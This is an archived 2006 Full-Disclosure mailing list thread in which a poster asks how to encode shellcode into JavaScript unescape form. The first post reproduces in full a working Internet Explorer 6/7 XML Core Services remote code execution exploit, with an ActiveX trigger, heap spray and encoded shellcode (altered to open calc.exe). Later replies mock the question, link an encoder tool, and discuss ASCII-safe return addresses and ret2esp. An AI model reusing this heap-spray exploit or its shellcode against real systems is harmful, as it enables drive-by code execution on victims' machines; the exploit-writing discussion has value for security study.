Login | Register For Free | Help
Search for: (Advanced)

Mailing List Archive: Full Disclosure: Full-Disclosure

How to covert shellcode to "HTML style" ?

  

 
Full Disclosure full-disclosure RSS feed   Index | Next | Previous | View Threaded


lotos.lee at gmail

Nov 9, 2006, 1:44 AM

Post #1 of 4 (842 views)
Permalink
How to covert shellcode to "HTML style" ?
For example ,I find This exploit:
MS Internet Explorer 6/7 (XML Core Services) Remote Code Exec
Exploit<http://www.milw0rm.com/exploits/2743>
*<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1 plus 2.0//EN">
<!--
MS Internet Explorer 6/7 (XML Core Services) Remote Code Execution Exploit

Author: n/a

Info:
http://blogs.securiteam.com/index.php/archives/721
http://isc.sans.org/diary.php?storyid=1823
http://xforce.iss.net/xforce/alerts/id/239

Found in the wild and was pointed out on securiteam's blog (cheers Gadi
Evron!)

Changed up the shellcode so it wouldn't be as evil for the viewers,
calc.exeis called.

/str0ke
-->

<html xmlns="http://www.w3.org/1999/xhtml">
<body>
<object id=target classid="CLSID:{88d969c5-f192-11d4-a65f-0040963251e5}" >
</object>
<script>
var obj = null;
function exploit() {
obj = document.getElementById('target').object;

try {
obj.open(new Array(),new Array(),new Array(),new Array(),new Array());
} catch(e) {};

sh = unescape ("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090" +
"%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120"
+
"%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424"
+
"%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304"
+
"%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0"
+
"%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A"
+
"%uFF57%u63E7%u6C61%u0063");

sz = sh.length * 2;
npsz = 0x400000-(sz+0x38);
nps = unescape ("%u0D0D%u0D0D");
while (nps.length*2<npsz) nps+=nps;
ihbc = (0x12000000-0x400000)/0x400000;
mm = new Array();
for (i=0;i<ihbc;i++) mm[i] = nps+sh;

obj.open(new Object(),new Object(),new Object(),new Object(), new
Object());

obj.setRequestHeader(new Object(),'......');
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
}
</script>
<body onLoad='exploit()' value='Exploit'>

</body></html>
*
*So,How to covert shellcode to this style :*
*sh = unescape ("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090" +
"%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120"
+
"%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424"
+
"%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304"
+
"%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0"
+
"%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A"
+
"%uFF57%u63E7%u6C61%u0063");
*


kokanin at gmail

Nov 9, 2006, 6:00 AM

Post #2 of 4 (788 views)
Permalink
Re: How to covert shellcode to "HTML style" ? [In reply to]
On 11/9/06, ̻ <lotos.lee[at]gmail.com> wrote:
> For example ,I find This exploit:

http://www.edup.tudelft.nl/~bjwever/src/beta.c, have fun with your
upcoming botnet.

--


debasis.mohanty.listmails at gmail

Nov 9, 2006, 12:20 PM

Post #3 of 4 (775 views)
Permalink
Re: How to covert shellcode to "HTML style" ? [In reply to]
Lol !! I was just about to point out the same Erik ...

Seen this couple of times in the past and a known technique :)


-----Original Message-----
From: full-disclosure-bounces[at]lists.grok.org.uk [mailto:full-disclosure-bounces[at]lists.grok.org.uk] On Behalf Of Knud Erik Højgaard
Sent: Thursday, November 09, 2006 6:01 AM
To: 李继辉
Cc: full-disclosure[at]lists.grok.org.uk
Subject: Re: [Full-disclosure] How to covert shellcode to "HTML style" ?

On 11/9/06, 李继辉 <lotos.lee[at]gmail.com> wrote:
> For example ,I find This exploit:

http://www.edup.tudelft.nl/~bjwever/src/beta.c, have fun with your upcoming botnet.

--

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


endrazine at gmail

Nov 11, 2006, 6:33 AM

Post #4 of 4 (760 views)
Permalink
Re: How to covert shellcode to "HTML style" ? [In reply to]
<take 2: had some issues in sending this one>

Hi list,


Knud Erik Højgaard a écrit :
> On 11/9/06, 李继辉 <lotos.lee[at]gmail.com> wrote:
>> For example ,I find This exploit:
>
> http://www.edup.tudelft.nl/~bjwever/src/beta.c, have fun with your
> upcoming botnet.
Nod, encoding the shellcode into an acceptable charset is something that
has been done for ages now (see
Philippe Biondi's shellforge - did you fix the final ret ? ;) - for
instance, or old phrack issues [2] [3]).

Let's focus a bit on x86:
What about the return address if you have a simple buffer overflow for
instance ? I just had a few
tests, and you can't simply urlencode the return address assuming the
webserver/client will decode it
automatically for you (it won't). Since adresses in the stack are
tipycally around 0xbf?????? in memory,
this return address _will_ contain non printable characters (at least
the \bf one,), even if the overflow is
big enougth so that you can get rid of the other ones by jumping at an
appropriate address in the stack...

I have no simple solution atm, but forging valid arguments for the
current syscall that will eventually
do something evil in the process (wich isn't something that can be done
in a systematic way) and _not_
overriting the return address.. You could think of crafting arguments
for previous stack frames too, but
since you still can't forge return addresses for those, you will not be
able to overwrite both local and
global variables pushed on the stack...

An other solution would be ret2esp [4], assuming you find :
1) a way to store your shellcode somewhere in memory, the address of
your shellcode being a pure
Ascii string.
2)an address in memory that will allow you to jmp %esp (or mov %esp,
etc.) , that address being
usable as a return address (ie: is a pure Ascii string).

I doubt those conditions will ever be met..

Things should be quite similar on Sparc architectures imho since afaik,
the return address isn't pushed
on the stack, so the problem is very close to this one.

In a nutshell : Erik, I disagree with you, I think it's a valid, non
trivial, question :)


Regards,

endrazine-

[1] http://www.secdev.org/projects/shellforge/ <---which isn't just ia32
between :)

[2] http://www.phrack.org/archives/57/p57-0x18

[3]
http://www.phrack.org/archives/61/p61-0x0b_Building_IA32_UnicodeProof_Shellcodes.txt


[4] http://www.tty64.org/doc/expwlnxgateso1.txt




_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Full Disclosure full-disclosure RSS feed   Index | Next | Previous | View Threaded
 
 


Interested in having your list archived? Contact lists@gossamer-threads.com
 
  Web Applications & Managed Hosting Powered by Gossamer Threads Inc.